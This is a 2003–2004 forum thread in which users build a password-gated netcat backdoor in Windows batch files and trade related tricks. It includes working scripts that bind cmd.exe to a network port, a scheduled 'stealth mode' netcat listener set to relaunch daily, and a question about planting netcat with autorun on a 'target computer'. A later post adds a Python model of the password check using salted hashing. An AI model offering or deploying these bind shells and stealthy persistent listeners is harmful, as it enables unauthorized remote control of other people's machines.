Full Version: New Netcat Fun
agamemnon
Oct 5 2003, 01:26 AM
I've just been playing around with batch commands and netcat, and have come up with this interesting little way of requesting a password.
The theory:
The server runs a simple netcat listener on port 1. This listener does almost nothing except copy whatever data it is fed to: downps.txt (nc -l -p 1 > downps.txt)
Upon disconnect, the server compares whatever data is in downps.txt to the data contained in pass.txt (our password). If the data is the same, a CMD.EXE shell is opened straight away on port 2. If the two files are different, the server waits for reconnect and does not open the command shell.
Obviously this method is not very secure, as anyone is able to connect to the port 2 command shell after the downps.txt file has been verified against the original pass.txt. However, speed in connecting to the shell as soon as it opens can overcome this barrier. As my "connectnc" program (see below) anticipates the connection to the port 2 shell, it leaves only a fraction of a second in which another system could connect to the shell, as netcat only supports one connection at a time.
In effect:
Pass.txt = moron
Server listens...
-Client connects
-Client sends 'helloooo'
Server copies 'helloooo' to downps.txt
Server compares downps.txt to pass.txt
They are not the same, Server resets...

Server listens...
-Client connects
-Client sends 'moron'
Server copies 'moron' to downps.txt
Server compares downps.txt to pass.txt
They are the same, Server opens CMD.EXE on port 2
-Client immediately connects to port 2 and gets his shell
Simple really. So, here's my code:
PASSNC.BAT (This is to be run on the server)
| CODE |
:START
@REM wait for one connection on port 1 and save everything it sends
@nc -l -p 1 > downps.txt
@REM compare the received data with the stored password; FIND sets errorlevel 1 when the "no differences" line is absent
@fc downps.txt pass.txt | FIND /i "FC: no differences encountered" > nul
@IF ERRORLEVEL 1 goto WRONG
@REM password ok (the files are the same)
@echo password CORRECT!
@del downps.txt
@nc -vv -l -p 2 -e cmd.exe
@GOTO START
:WRONG
@echo password incorrect
@del downps.txt
@GOTO START
|
PASS.TXT
CONNECTNC.BAT (This is used to connect to the server)
| CODE |
@REM send the password; note that echo transmits "%1 " (trailing space) followed by CRLF, so pass.txt must hold exactly those bytes
@echo %1 | nc www.xxx.yyy.zzz 1 -w 1
@echo password sent...
@REM connect to the shell the server opens on port 2 if the password matched
nc -vv www.xxx.yyy.zzz 2
|
(USAGE: CONNECTNC [PASSWORD] eg CONNECTNC moron)
A successful connect will look something like this:
| QUOTE |
C:\Documents and Settings\Ed\Desktop>connectnc moron
password sent...

C:\Documents and Settings\Ed\Desktop>nc -vv 127.0.0.1 2
DNS fwd/rev mismatch: localhost != ED
localhost [127.0.0.1] 2 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Ed\Desktop>
|
Yes, there are many programs that can do all this for you, but what do they teach you? Nothing. - This is much more fun! (In a min I'll post how to hack it!) If you don't understand the code, just say so. I couldn't be bothered to 'comment' it, so I'd be more than happy to help out.
agamemnon
Oct 5 2003, 02:10 AM
Ok, perhaps I was being too ambitious in trying to hack this code so quickly... My initial ideas don't seem to be getting me anywhere, so when you've finished playing around with the above, could you please give me a hand? heehee.

1) A dictionary attack. - Well, actually, I've done this one, and yes, it does work - but who would ever choose such a weak password?!

2) A brute force attack. - I've never written this sort of script in DOS and am not really sure how to go about it. I'll have a think about that one later.

3) Corrupting the FIND or FC commands that run inside PASSNC.BAT - Again, no joy here. I've tried firing "^C"s as the password, but that won't produce any error. The only error I've been able to make FC reproduce is: 223 x A (Or was it 224? - Oooops)

| QUOTE |
C:\Documents and Settings\Ed\Desktop>fc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA pass.txt
FC: Out of memory
|

And anyway, the connecting client would have no control over what the file could be called. PASSNC.BAT always calls it downps.txt no matter what.

Just a thought: There are no controls over just how big downps.txt can actually be, so what's stopping us giving, say, ooooh 50GB of data to really give the HDD a hard time?

EDIT: Ok, I've realised what's stopping us from doing that: "@del downps.txt". There would be no point in uploading a massive file as it would only be deleted on disconnect.

As far as I can see (which is not very far), this little script is surprisingly secure as a password feature. What's more, it's fully customisable and you just can't help but feel you're a "hacker" (in the true, rather more philosophical sense of the word) when using it. Heehee, even if it is lame code. If anyone does come up with an interesting way to break this then please post it up - I'd really really really like to know, lol. And at that, please do try to break it - it's my code, and I'd love to know its weaknesses.

(The code contained in these two posts is for educational purposes ONLY. I accept no responsibility for any damage it may cause. Use at your own risk.)
marcofulvio
Oct 5 2003, 07:44 AM
Wow, look at this: http://www.itcow.com/staticpages/index.php...030130141516630 You will be amazed how much this has nothing to do with computer security, batch programs or even your topic (hehe), but it's a nice link for these spare times.
andydis
Oct 6 2003, 11:17 AM
You could try www.ericphelps.com. Whatever you cannot do in DOS you CAN do in VBScript. :-) diz UK. agamemnon, drop us an email, I'd like to see what else you have on batch file stuff, maybe even swap ideas.
agamemnon
Oct 6 2003, 03:04 PM
(PM me, I don't like email)
Maybe we should have a BATCH subsection of the forum? How many of us are there that would find such a thing useful?
Of course, who says that pass.txt (above) needs to be a txt file? It could be anything. You could use a program as the 'password'...
The most secure way would be to have a long binary file as the password. Ouf, I'll leave it to your imagination. It's pretty versatile code.
agamemnon
Oct 6 2003, 07:41 PM
Very few interested replies. Here are the programs then - with newly added instructions.
ikah
Oct 6 2003, 08:00 PM
You could do "type PASSNC.BAT"?? And then you see the pass is in pass.txt >> type pass.txt. Or am I thinking wrong here?
agamemnon
Oct 6 2003, 08:14 PM
Yeah... you're thinking wrong... sorry!
Server is on the right, client on the left:
--------port1---->PASSWORD REQUEST<----port1---SENDS PASSWORD
received password -> downps.txt
downps compared to pass.txt
pass.txt
      |                    |
The same?:-------port2------->SHELL<---port2-----CONNECTS SHELL
      |                    |
Not the same?----RESTARTS
The client is not able to run 'type pass.txt' until he has got the password right. Of course, once he's got the shell he's quite entitled to "echo hahaha, i've changed the password > pass.txt".
hotpanther
Oct 13 2003, 08:39 PM
Salutes to all the gurus out there. I've been trying to play around with NC, but still can't get it to work. Here is my question: if I manage to install NC on the target computer and use a .bat file to autorun it every time, I should get a cmd interface when I connect to it, is that right? If I do get a cmd interface once connected, does that mean I can use DOS just like a normal cmd? Thanks for answering my naive question in advance.
LittleHacker
Dec 22 2003, 02:53 PM
Nice topic. Well, this is another good command for nc, to run it at a specific time. For example: C:\> at \\127.0.0.1 12:00a /every:1 "nc -d -l -p 8080 -c cmd.exe" This command makes NetCat listen on port 8080 in Stealth mode every day at 12:00 AM.
saendler
Dec 22 2003, 07:39 PM
i like it ... good work :-D
Quasimod
Dec 22 2003, 08:04 PM
| QUOTE (LittleHacker @ Dec 22 2003, 02:53 PM) |
Nice topic. Well, this is another good command for nc, to run it at a specific time. For example: C:\> at \\127.0.0.1 12:00a /every:1 "nc -d -l -p 8080 -c cmd.exe" This command makes NetCat listen on port 8080 in Stealth mode every day at 12:00 AM.
|
Nice..
t00sTr0nG
Dec 22 2003, 09:44 PM
Oh very nice!! I will test it :-) THX toostrong
wiley
Dec 22 2003, 11:04 PM
let's give it a try, good job btw
Fareway
Dec 23 2003, 11:58 AM
fantastic - good function. i'll try it out now!
LittleHacker
Dec 23 2003, 01:17 PM
Thanks EveryBody
Neo2k
Dec 23 2003, 08:41 PM
| QUOTE (agamemnon @ Oct 6 2003, 03:04 PM) |
Maybe we should have a BATCH subsection of the forum? How many of us are there that would find such a thing useful?
|
I think it will be nice ... I love batch programming
esorone
Jan 26 2004, 10:32 AM
This is a great post,
Lots of useful stuff in here.
Thx all
DerangeD
Jan 31 2004, 05:14 AM
Really nice m8, gonna give it a try! Edit: it doesn't work here, always getting pass incorrect. Uploaded pass.txt, passnc.bat and nc.exe to the server, then passnc.bat. pass.txt is "a". Typed connectnc.bat a. Sending pass... connection refused. Tried this @home and remote, didn't work on any of them. Could someone explain what I am doing wrong here :s tia..
st3@1th
Feb 4 2004, 06:12 PM
Another nice nc batch password discussion.
You still haven't posted how to hack it, if there's a way to bypass the password check from within the batch file I'd be interested to see it.
BTW I came up with a stripped down password prompt batch file, no need to create multiple files or open a second port.
Just set nc to pipe this batch file on any given port:
| CODE |
@echo off
@REM blank line (a bare "echo" would print "ECHO is off.")
@echo.
@set /p pass=Enter password:
IF not "%pass%"=="pass" goto else
@cmd.exe
:else
@echo Connection terminated.
@pause
|
What do you think?
FooTE
Feb 7 2004, 12:19 AM
I think a batch forum would be a cool idea! Nice scripts using nc btw, they work wonders and are simple and easy to understand. nice1!
w00dy
Feb 7 2004, 01:19 AM
| QUOTE |
I think a batch forum would be a cool idea!
|
There is a programming section, and a windows section, and if we add a batch forum, we sure as hell add a shell script forum too. So I would have to say I'm against a batch only forum. Feel free to add to the programming section, maybe start a Batch Tricks and tips thread and anyone can add to it.
the_master912
Feb 8 2004, 10:03 PM
| QUOTE |
@fc downps.txt pass.txt | FIND /i "FC: no differences encountered" > nul
|
I don't know if the fc command is recommended for that kind of thing. Maybe an md5 checksum could be better, I don't know, what do you think?
| QUOTE |
ABOUT FC COMMAND: FC or file compare is used to compare two files against each other. Once completed fc will return lines which differ between the two files. If no lines differ you will receive a message indicating no differences encountered.
|
master912
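To make two points from this thread concrete, here is an added Python model of the PASSNC.BAT check (my own example, not code from the thread): cmd's `echo %1 | nc ...` sends the argument plus a trailing space and CRLF, so the byte-exact `fc` compare only succeeds when pass.txt holds exactly those bytes, and master912's checksum idea can be taken further by storing a salted PBKDF2 digest and comparing it in constant time, so the server never keeps the cleartext in pass.txt. All function names and the sample data are constructed for this example.

```python
"""Model of the PASSNC.BAT password check (added example, not the thread's code)."""
import hashlib
import hmac
import os

SALT_LEN = 16


def cmd_echo_pipe(arg: str) -> bytes:
    """Bytes that `echo <arg> | nc ...` hands to netcat under cmd.exe:
    everything between 'echo ' and the pipe, including the space before '|',
    followed by CRLF. This is what lands in downps.txt on the server."""
    return arg.encode() + b" \r\n"


def fc_equal(received: bytes, stored: bytes) -> bool:
    """fc with no switches reports any line that differs, so the two files
    must match byte for byte; modelled here as plain byte equality."""
    return received == stored


def make_record(password: str, salt: bytes = b"") -> bytes:
    """Replacement for a cleartext pass.txt: salt || PBKDF2-HMAC-SHA256(password).
    A caller may pass a fixed salt only for reproducible demonstrations."""
    salt = salt or os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt + digest


def hashed_check(received: bytes, record: bytes) -> bool:
    """Strip what echo and the pipe appended, then compare digests in constant
    time (passwords ending in blanks are not supported by this normalisation)."""
    salt, digest = record[:SALT_LEN], record[SALT_LEN:]
    candidate = received.rstrip(b" \r\n")
    cand_digest = hashlib.pbkdf2_hmac("sha256", candidate, salt, 100_000)
    return hmac.compare_digest(cand_digest, digest)


def demo() -> tuple:
    """Constructed walk-through with the thread's password 'moron'."""
    typed_in_editor = b"moron"              # pass.txt saved without trailing blank/newline
    sent = cmd_echo_pipe("moron")           # b"moron \r\n" arrives at the listener
    brittle = fc_equal(sent, typed_in_editor)   # False: the trailing " \r\n" differs
    exact = fc_equal(sent, b"moron \r\n")       # True once pass.txt has the same bytes
    record = make_record("moron", salt=b"\x00" * SALT_LEN)  # fixed salt for the demo only
    ok = hashed_check(sent, record)
    bad = hashed_check(cmd_echo_pipe("helloooo"), record)
    return brittle, exact, ok, bad
```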
JabbaDaGutt
May 12 2004, 03:30 AM
Couldn't you just use Cryptcat.exe and have your connection protection be your encryption key?
That seems to work fine for me. Plus then the connection is encrypted, a bit more secure. And a lot easier to set up. Does anyone have any thoughts about using this way? Are there any cons to using Cryptcat's encryption?